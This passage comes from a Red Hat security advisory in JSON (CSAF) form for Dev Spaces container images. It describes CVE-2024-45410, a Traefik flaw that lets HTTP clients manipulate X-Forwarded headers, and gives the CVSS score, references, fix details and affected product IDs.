"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "golang.org/x/crypto/ssh: Misuse of ServerConfig.PublicKeyCallback may cause authorization bypass in golang.org/x/crypto"
},
{
"cve": "CVE-2024-45410",
"cwe": {
"id": "CWE-348",
"name": "Use of Less Trusted Source"
},
"discovery_date": "2024-09-19T17:00:10.951603+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2313584"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Traefik. When a HTTP request is processed by Traefik, certain HTTP headers such as X-Forwarded-Host or X-Forwarded-Port are added by Traefik before the request is routed to the application. For a HTTP client, it should not be possible to remove or modify these headers. Since the application trusts the value of these headers, security implications might arise if they can be modified. For HTTP/1.1, however, it was found that some of theses custom headers can indeed be removed and in certain cases manipulated.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "traefik: HTTP client can manipulate custom HTTP headers that are added by Traefik",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in Traefik is important due to its impact on the integrity of HTTP headers that are often used for security-sensitive operations. When the X-Forwarded headers, such as X-Forwarded-Host or X-Forwarded-Tls-Client-Cert, can be removed or manipulated by the client, applications relying on these headers for trust validation, client authentication, or access control are exposed to potential privilege escalation or unauthorized access. The ability to bypass or alter these headers compromises the security model that many backend services depend on, particularly in reverse proxy or load balancer setups.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45410"
},
{
"category": "external",
"summary": "RHBZ#2313584",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313584"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45410",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45410"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45410",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45410"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik",
"url": "https://github.com/traefik/traefik"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/commit/584144100524277829f26219baaab29a53b8134f",
"url": "https://github.com/traefik/traefik/commit/584144100524277829f26219baaab29a53b8134f"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/releases/tag/v2.11.9",
"url": "https://github.com/traefik/traefik/releases/tag/v2.11.9"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/releases/tag/v3.1.3",
"url": "https://github.com/traefik/traefik/releases/tag/v3.1.3"
},
{
"category": "external",
"summary": "https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv",
"url": "https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv"
}
],
"release_date": "2024-09-19T14:48:10+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2025-05-28T02:39:39+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2025:8244"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:60f6c9724b2c7e773654d7fd176829661420b6a3eb9df7f72c3560e7890fe691_s390x",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:ac07b6bc8c311b357ab5e0545a2b80aa567c2f76b9ed01a3d382b5685b688c83_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:4c5430c1e53219652c27d861d7a7d577097db0dad05ded83b814275cb9a6cad2_ppc64le",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:7107f9bf1082a528e0f3af30a5b02e26a770b3430600596e37bebafa18fd0786_amd64",
"9Base-RHOSDS-3:devspaces/pluginregistry-rhel9@sha256:989fc72b261f44374f16ba8aa190791d04da8b295933f724a00bc31a84efd89e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:52ea2c5e3244363b1d131b8551c10abc687b18f95ca5b9f561f79041a6f06c21_amd64",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:ae275fed16fdc724d0e48659c3de940e4af3e0722d3b5d465634d31f5a2a972e_s390x",
"9Base-RHOSDS-3:devspaces/server-rhel9@sha256:edae16c9f7a40feaf051b22a05945fd3a51033d031b742346105cff657848881_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:24a8578aa65eaeb3fbbc4809db2bd8e57cd76cc6a96d94ce67aa22f1b5d4a4a5_amd64",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:2a9c66e55371adf209b5b317068e63cfbd9b3e27da9de210250607da8b3ffdff_ppc64le",
"9Base-RHOSDS-3:devspaces/traefik-rhel9@sha256:90df466eef849a4fd6846345273968f875397d72f24c38445058d462d861ca9c_s390x",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:25b8dab260796cc1962ef2c31a6c8b98e258b1a9e8b13580da798a0074acd4e8_amd64",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:89d858f949b7bbc4502109ff8ab3cf0f416ad1a4c9432924669fc30eeba26b86_ppc64le",
"9Base-RHOSDS-3:devspaces/udi-base-rhel9@sha256:e1b46dd642b4391ece60c7bc3bb062ba81c3c975cb3723ade62f5a230a43ed5d_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:c98bbca9019281daafac3fb0ac3590258ca5c93ecc954e5127c1c99db4aa0315_amd64",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:e6d836b45dfb32da1a94114ab9908251da24adeeca932de89ba0e23d4f104e22_s390x",
"9Base-RHOSDS-3:devspaces/udi-rhel9@sha256:f6be90596ba55531a1ef7acf4041ed2828d4fe8a3cdd4e8b251bf4929bd19700_ppc64le"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"9Base-RHOSDS-3:devspaces-tech-preview/idea-rhel9@sha256:e57eccb97cb2329af1654e27ad2ad30bb30de70c496b0e6e4353d2d0ce9274b8_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:6f3737f74c7659d65af8fe9a7cab165f8cdb1554b8ff963352885e1d9014ff27_amd64",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:82d121266eb9adca7faa9af0da6c89323cfe24add67bcba759a6a81ca161ba2f_s390x",
"9Base-RHOSDS-3:devspaces-tech-preview/jetbrains-ide-rhel9@sha256:9a8899c791034c3395c081fbe55746021d372ea1ea3523f2a72bf7e31a2a4132_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:08f2e3cd088b9d1176e61f8017126ecaa7447ade3aede5d63e49bd678b5cc30b_s390x",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:d36fb4add09a1576207fe4b114f60142a43b351d218b1f5d0807bacc19c02915_ppc64le",
"9Base-RHOSDS-3:devspaces/code-rhel9@sha256:e48a0e27d13aff1bc60facd4ef3bd875f3b9c68b33c5d9be86dcf2fb46971d24_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:403b6c1ddb3fe9337fc1f83129d0b9e51dc18948df29f94212e291246b828e90_amd64",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:97544fe3e08648e8f0aec09dda768e884b0c213be0b833568747c797d492bb42_ppc64le",
"9Base-RHOSDS-3:devspaces/configbump-rhel9@sha256:a47dcbcc9292e09c31ad8df74d54b58aa03db782700937365434407029c586d7_s390x",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:4fb48f0964049b6e56c71cac4973c8ec4ae53b3248ec842e58ec499736e3ffb7_ppc64le",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:bbb3292a84927c24cdef7aaff704cc12560172ba0c55021bf397d92f0f8c04c8_amd64",
"9Base-RHOSDS-3:devspaces/dashboard-rhel9@sha256:f894dcaddbc0dd33c9e524e33bf54416f08dd328838bbe2c869eb7201cf7ef1a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:b05f216166a75a5ae3f56495ea4f47a6c3b91d5405360cd991f7c9d545491150_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:ba152d33e05c8d53dd9c39249ba9756418619ff784ef1e4cb296a7aa1a33adfd_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-operator-bundle@sha256:f463c35bfe9daac4929295c610f07935ff9655793b72d5fd040944fad8307c9a_s390x",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:0cfde874c304561625ac5a838df9d90514bafddd5af6f7ed38f1476475497df3_amd64",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:23280e408cce44be3fc8ebf244b19f5e386da1e6fab218a1a3ee8a1748f132f9_ppc64le",
"9Base-RHOSDS-3:devspaces/devspaces-rhel9-operator@sha256:e2b9c33d133573a466fead6c5f904d7ef31ba96d5fce1a619f3ff8c47d86a9da_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:4e11c662d89bb01653f32ed2f3bc66a67be8a1464e267a564a30e36d047b46a6_s390x",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:899c0fa0d3035a2da050c9dc765d2d5a1e79969ac8e5fe772e6dab003940c4b4_amd64",
"9Base-RHOSDS-3:devspaces/imagepuller-rhel9@sha256:8de9e91840963be836e62c27395e7c37ebe1e908770a817197cb938fcf1777dc_ppc64le",
"9Base-RHOSDS-3:devspaces/machineexec-rhel9@sha256:0ce141da5a9eec8fd61d6beee7c993ed4731a4b25501fd3a8f261a4aeab2ccda_amd64",
